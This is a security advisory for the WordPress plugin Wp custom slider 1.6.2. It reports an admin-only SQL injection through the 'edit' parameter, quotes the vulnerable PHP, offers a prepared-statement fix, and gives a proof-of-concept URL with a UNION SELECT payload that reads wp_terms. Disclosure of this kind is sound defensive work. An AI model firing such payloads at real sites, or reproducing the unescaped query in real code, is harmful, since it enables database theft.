Wp custom slider 1.6.2 – Plugin WordPress – SQL Injection

Homepage:

https://wordpress.org/plugins/wp-custom-slider/

Description:

Required user access: admin user.

$_REQUEST['edit'] is neither validated nor escaped before it is interpolated into a SQL query, so an authenticated admin can perform SQL injection through it.

File / Code:

Path: /wp-content/plugin/wp-custom-slider/customslider-ex-settings.php

Line: 371

if(isset($_REQUEST['edit']))
{
    // $id is taken straight from the request without validation or escaping
    $id=$_REQUEST['edit'];

    // $id is concatenated directly into the query string, so the WHERE clause is attacker-controlled
    $query_pag_data=$wpdb->get_results("select * from ".$wpdb->prefix."customslider_images where id=$id");
?>
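A hardened rewrite of the query above, added here as an example and not the plugin's own code: the id is coerced to an integer with absint() and bound through $wpdb->prepare() with a %d placeholder, so the request value can no longer change the structure of the query (it assumes the same $wpdb global and table name as the original).

```php
<?php
// Added example (not plugin code): hardened form of the vulnerable query.
// Assumes the WordPress globals ($wpdb) and table name used by the original.
if ( isset( $_REQUEST['edit'] ) ) {
    // absint() returns a non-negative integer; any injected SQL text becomes 0,
    // which simply matches no row.
    $id = absint( $_REQUEST['edit'] );

    // $wpdb->prepare() binds the value into the statement; %d forces an
    // integer so the WHERE clause cannot be extended with UNION or similar.
    $query_pag_data = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}customslider_images WHERE id = %d",
            $id
        )
    );
}
```

Because this page is reached only by an admin user, a capability check (current_user_can()) and a nonce on the request are the usual companions to the prepared statement, but the prepared statement alone removes the injection.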

Proof of Concept:

1 – Login with admin user.

2 – Url with injection:

http://target/wp-admin/options-general.php?page=custom_slider&showall=a&edit=0+UNION+SELECT+1,CONCAT(name,char(58),slug),3,4,5,6,7+FROM+wp_terms+WHERE+term_id=1

3 – Result:

Timeline:

  • 12/01/2016 – Discovered
  • 13/12/2016 – Vendor not found
